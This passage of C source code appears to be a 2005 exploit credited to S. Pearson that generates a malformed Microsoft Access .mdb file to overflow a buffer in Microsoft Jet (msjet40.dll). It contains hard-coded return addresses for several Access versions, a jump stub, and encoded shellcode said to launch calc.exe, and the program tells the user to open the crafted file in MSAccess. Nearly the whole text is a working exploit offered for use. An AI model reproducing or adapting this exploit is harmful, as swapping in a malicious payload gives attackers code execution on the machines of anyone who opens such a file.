"\x00\x00\x00\x02\x00\x00\x00\x00\x06\x00\x00\x01\x06\x00\x00\x00" "\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11" "\x00\x00\x00\x00\x00\x00\x00\x0C\x59\x06\x00\x00\x09\x00\x03\x00" "\x00\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x0C\x59\x06\x00\x00\x08\x00\x02\x00\x00\x00\x09\x04\x00\x00\x12" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x59\x06\x00\x00\x04\x00" "\x01\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00\x0a\x00" "\x08\x00\x08\x59\x06\x00\x00\x05\x00\x01\x00\x00\x00\x09\x04\x00" "\x00\x13\x00\x00\x00\x00\x00\x12\x00\x08\x00\x04\x59\x06\x00\x00" "\x07\x00\x02\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00" "\x1A\x00\x04\x00\x0A\x59\x06\x00\x00\x0A\x00\x04\x00\x00\x00\x09" "\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\xFE\x01\x04\x59\x06" "\x00\x00\x00\x00\x00\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00" "\x00\x00\x00\x00\x04\x00\x0B\x59\x06\x00\x00\x0D\x00\x07\x00\x00" "\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B" "\x59\x06\x00\x00\x10\x00\x0A\x00\x00\x00\x09\x04\x00\x00\x12\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x59\x06\x00\x00\x0F\x00\x09" "\x00\x00\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x0B\x59\x06\x00\x00\x0E\x00\x08\x00\x00\x00\x09\x04\x00\x00" "\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0A\x59\x06\x00\x00\x02" "\x00\x00\x00\x00\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00" "\x00\xFE\x01\x09\x59\x06\x00\x00\x06\x00\x01\x00\x00\x00\x09\x04" "\x00\x00\x32\x00\x00\x00\x00\x00\x00\x00\xFE\x01\x04\x59\x06\x00" "\x00\x01\x00\x00\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00" "\x00\x04\x00\x04\x00\x0B\x59\x06\x00\x00\x0C\x00\x06\x00\x00\x00" "\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x59" "\x06\x00\x00\x0B\x00\x05\x00\x00\x00\x09\x04\x00\x00\x12\x00\x00" "\x00\x00\x00\x00\x00\xFE\x01\x03\x59\x06\x00\x00\x03\x00\x01\x00" "\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00\x08\x00\x02\x00" "\x0E\x00\x43\x00\x6F\x00\x6E\x00\x6E\x00\x65\x00\x63\x00\x74\x00" "\x10\x00\x44\x00\x61\x00\x74\x00\x61\x00\x62\x00\x61\x00\x73\x00" "\x65\x00\x14\x00\x44\x00\x61\x00\x74\x00\x65\x00\x43\x00\x72\x00" "\x65\x00\x61\x00\x74\x00\x65\x00\x14\x00\x44\x00\x61\x00\x74\x00" "\x65\x00\x55\x00\x70\x00\x64\x00\x61\x00\x74\x00\x65\x00\x0A\x00" "\x46\x00\x6C\x00\x61\x00\x67\x00\x73\x00\x16\x00\x46\x00\x6F\x00" "\x72\x00\x65\x00\x69\x00\x67\x00\x6E\x00\x4E\x00\x61\x00\x6D\x00" "\x65\x00\x04\x00\x49\x00\x64\x00\x04\x00\x4C\x00\x76\x00\x0E\x00" "\x4C\x00\x76\x00\x45\x00\x78\x00\x74\x00\x72\x00\x61\x00\x10\x00" "\x4C\x00\x76\x00\x4D\x00\x6F\x00\x64\x00\x75\x00\x6C\x00\x65\x00" "\x0C\x00\x4C\x00\x76\x00\x50\x00\x72\x00\x6F\x00\x70\x00\x08\x00" "\x4E\x00\x61\x00\x6D\x00\x65\x00\x0A\x00\x4F\x00\x77\x00\x6E\x00" "\x65\x00\x72\x00\x10\x00\x50\x00\x61\x00\x72\x00\x65\x00\x6E\x00" "\x74\x00\x49\x00\x64\x00\x16\x00\x52\x00\x6D\x00\x74\x00\x49\x00" "\x6E\x00\x66\x00\x6F\x00\x4C\x00\x6F\x00\x6E\x00\x67\x00\x18\x00" "\x52\x00\x6D\x00\x74\x00\x49\x00\x6E\x00\x66\x00\x6F\x00\x53\x00" "\x68\x00\x6F\x00\x72\x00\x74\x00\x08\x00\x54\x00\x79\x00\x70\x00" "\x65\x00\x83\x07\x00\x00\x01\x00\x01\x02\x00\x01\xFF\xFF\x00\xFF" "\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF" "\x00\xFF\xFF\x00\x10\x06\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" "\x81\x00\x00\x00\x00\x00\x83\x07\x00\x00\x00\x00\x01\xFF\xFF\x00" "\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF" "\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\x11\x06\x00\x00\x08\x00\x00\x00" "\x00\x00\x00\x00\x81\x00\x00\x00\x00\x00\x59\x06\x00\x00\x01\x00" "\x00\x00\x01\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x04" "\x04\x01\x00\x00\x00\x00\x59\x06\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x04\x04\x00\x00\x00" "\x00\x00"; char shell_jmp[]= "\x14\x00" // Expanded ID Parameter (20 bytes) to accommodate this code "\x83\xC6\x08" // Add ESI,8 (Pointer to our shellcode) "\xFF\xE6" // Call ESI (Execute Shellcode) "\x90\x90\x90\x90" "\x90\x90\x90\x90" // Not used "\x90\x90\x90"; char EIP[]= //"\x47\xAD\x05\x30"; // MSAccess 2003 (jmp edx) "\xF7\x69\x05\x30"; // MSAccess 2002 (jmp edx) //"\xFf\xf7\x07\x30"; // MSAccess 2000 (jmp edx) char vuln_param[]= "\x18\x00\x50\x00" "\x61\x00\x72\x00" "\x65\x00\x6E\x00" "\x74\x00\x49\x00" "\x64\x00\x4E\x00" "\x61\x00\x6D\x00" "\x65\x00\x00\x01" // 0100 will result in EDX pointing to a // variable containing our MSAccess offset "\x04\x06\x00\x00" "\x05\x06" ; char shellcode[]= /* Invokes Calc.exe in another Process */ "\x29\xC9\x83\xE9\xDB\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xA9" "\x67\x4A\xCC\x83\xEB\xFC\xE2\xF4\x55\x8F\x0C\xCC\xA9\x67\xC1\x89" "\x95\xEC\x36\xC9\xD1\x66\xA5\x47\xE6\x7F\xC1\x93\x89\x66\xA1\x2F" "\x87\x2E\xC1\xF8\x22\x66\xA4\xFD\x69\xFE\xE6\x48\x69\x13\x4D\x0D" "\x63\x6A\x4B\x0E\x42\x93\x71\x98\x8D\x63\x3F\x2F\x22\x38\x6E\xCD" "\x42\x01\xC1\xC0\xE2\xEC\x15\xD0\xA8\x8C\xC1\xD0\x22\x66\xA1\x45" "\xF5\x43\x4E\x0F\x98\xA7\x2E\x47\xE9\x57\xCF\x0C\xD1\x68\xC1\x8C" "\xA5\xEC\x3A\xD0\x04\xEC\x22\xC4\x40\x6C\x4A\xCC\xA9\xEC\x0A\xF8" "\xAC\x1B\x4A\xCC\xA9\xEC\x22\xF0\xF6\x56\xBC\xAC\xFF\x8C\x47\xA4" "\xD7\xBF\xA8\xBF\xC1\xFF\xB4\x46\xA7\x30\xB5\x2B\x41\x89\xB5\x33" "\x56\x04\x2B\xA0\xCA\x49\x2F\xB4\xCC\x67\x4A\xCC"; char body2[]= "\x02\x01\xA9\x0E\x00\x00\x00\x00\x4F\x01\x00\x00\x59\x06\x00\x00" "\x34\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x53\x04\x00\x01\x00\x04\x00\x01" "\x00\x00\x00\x01\x00\x00\x00\x12\x06\x00\x00\x13\x06\x00\x00\x00" "\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x04\x59\x06\x00\x00" "\x02\x00\x01\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00" "\x04\x00\x04\x00\x01\x59\x06\x00\x00\x03\x00\x01\x00\x00\x00\x09" "\x04\x00\x00\x13\x00\x00\x00\x00\x00\x00\x00\x01\x00\x04\x59\x06" "\x00\x00\x00\x00\x00\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00" "\x00\x00\x00\x00\x04\x00\x09\x59\x06\x00\x00\x01\x00\x00\x00\x00" "\x00\x09\x04\x00\x00\x32\x00\x00\x00\x00\x00\x07\x00\xFE\x01\x06" "\x00\x41\x00\x43\x00\x4D\x00\x18\x00\x46\x00\x49\x00\x6E\x00\x68" "\x00\x65\x00\x72\x00\x69\x00\x74\x00\x61\x00\x62\x00\x6C\x00\x65" "\x00\x10\x00\x4F\x00\x62\x00\x6A\x00\x65\x00\x63\x00\x74\x00\x49" "\x00\x64\x00\x06\x00\x53\x00\x49\x00\x44\x00\x83\x07\x00\x00\x00" "\x00\x01\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x09\xFF\xFF\x00\xFF\xFF" "\x00\xFF\xFF\x00\xFF\xFF\x04\xFF\xFF\x12\xFF\xFF\x00\x14\x06\x00" "\x00\x09\x000\x0\x00\x41\x00\x74\x00\x88\x00\x00\x00\x00\x00\x59" "\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF" "\x00\x00\x00\x00\x04\x04\x00\x00\x00\x00\x00\x10\x00\x4F\x00\x62" "\x00\x6A\x00\x65\x00\x63\x00\x74\x00\x49\x00\x64\x00\xFF\xFF\x00"; char mdb[94208]; int main(int argc,char *argv[]) { FILE *filename_mdb; if(argc == 1) { printf("\nMicrosoft Jet (msjet40.dll) Exploit\n"); printf("===================================\n\n"); printf("Author: S.Pearson\n"); printf("Organisation: Computer Terrorism (UK)\n\n"); printf("Usage: %s <filename.mdb>\n",argv[0]); return 1; } filename_mdb = fopen(argv[1],"wb"); memset(mdb,0x00,sizeof(mdb)); //fill with nulls memcpy(mdb,header,sizeof(header)); memset(mdb+sizeof(header)-1,0x43, 7968); memcpy(mdb+sizeof(header)-1+7969-1,body, sizeof(body)); memcpy(mdb+sizeof(header)-1+7968+sizeof(body)-1,shell_jmp, sizeof(shell_jmp)); memcpy(mdb+sizeof(header)-1+7968+sizeof(body)-1+sizeof(shell_jmp)-1, EIP, sizeof(EIP)); memcpy(mdb+sizeof(header)-1+7968+sizeof(body)-1+sizeof(shell_jmp)-1+sizeof(EIP)-1, vuln_param, sizeof(vuln_param)); memcpy(mdb+sizeof(header)-1+7968+sizeof(body)-1+sizeof(shell_jmp)-1+sizeof(EIP)-1+sizeof(vuln_param)-1, shellcode, sizeof(shellcode)); memset(mdb+sizeof(header)-1+7968-1+sizeof(body)-1+sizeof(shell_jmp)-1+sizeof(EIP)-1+sizeof(vuln_param)-1+sizeof(shellcode), 0x43, 2924); memcpy(mdb+sizeof(header)-1+7968-1+sizeof(body)-1+sizeof(shell_jmp)-1+sizeof(EIP)-1+sizeof(vuln_param)-1+sizeof(shellcode)-1+2924-1,body2,sizeof(body2)); if(filename_mdb) { fwrite(mdb,1,sizeof(mdb),filename_mdb); fclose(filename_mdb); } printf("Malformed .mdb file created.\n"); printf("Now open with MSAccess.\n"); return 0; } // milw0rm.com [2005-04-11]